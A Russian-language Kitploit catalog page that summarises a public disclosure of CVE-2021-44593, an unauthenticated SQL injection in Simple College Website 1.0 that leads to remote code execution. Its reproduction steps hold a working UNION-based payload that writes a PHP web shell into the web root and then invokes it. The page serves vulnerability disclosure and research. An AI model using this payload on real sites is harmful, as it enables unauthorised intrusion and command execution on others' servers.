Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2021-44593 — Публичное раскрытие и разбор CVE-2021-44593 — неаутентифицированная SQL-инъекция в Simple College Website, приводящая к произвольной загрузке файлов и удалённому выполнению кода. | Kitploit
Инструменты/GitHubGitHub/mister-joe/cve-2021-44593
Анализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийВеб-безопасностьТестирование на Проникновение
GitHubmister-joe/cve-2021-44593

CVE-2021-44593

Публичное раскрытие и разбор CVE-2021-44593 — неаутентифицированная SQL-инъекция в Simple College Website, приводящая к произвольной загрузке файлов и удалённому выполнению кода.

Репозиторий
24 лет назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

CVE-2021-44593

Публичное раскрытие CVE-2021-44593. Уязвимость SQL-инъекции/произвольной загрузки файлов/удалённого выполнения кода в Simple College Website.

ОПИСАНИЕ

Simple College Website 1.0 уязвим к неаутентифицированной SQL-инъекции на основе UNION в параметре "username" страницы /admin/login.php, которую затем можно использовать для загрузки произвольных файлов и получения удалённого выполнения кода.

ЗАТРОНУТЫЕ КОМПОНЕНТЫ

Функция login() в admin_class.php

ШАГИ ДЛЯ ВОСПРОИЗВЕДЕНИЯ

  1. Откройте страницу входа администратора (обычно /admin/login.php)
  2. Отправьте форму входа с параметром POST "username", содержащим следующую SQL-инъекцию на основе UNION:
root@kitploit:~
' union select null, null, ("<?php system($_GET['cmd']);?>"), null, null INTO OUTFILE '/var/www/html/testing.php'; -- -
  1. Перейдите на /testing.php?cmd=id

ПРИМЕЧАНИЯ

  1. Необходимо знание расположения корневого каталога веб-сервера.
  2. Также может потребоваться знание расположения корневого каталога документов, если он не совпадает с корневым каталогом веб-сервера.
  3. Кроме того, демону MySQL необходимы права на запись в указанный каталог.
Скачать инструмент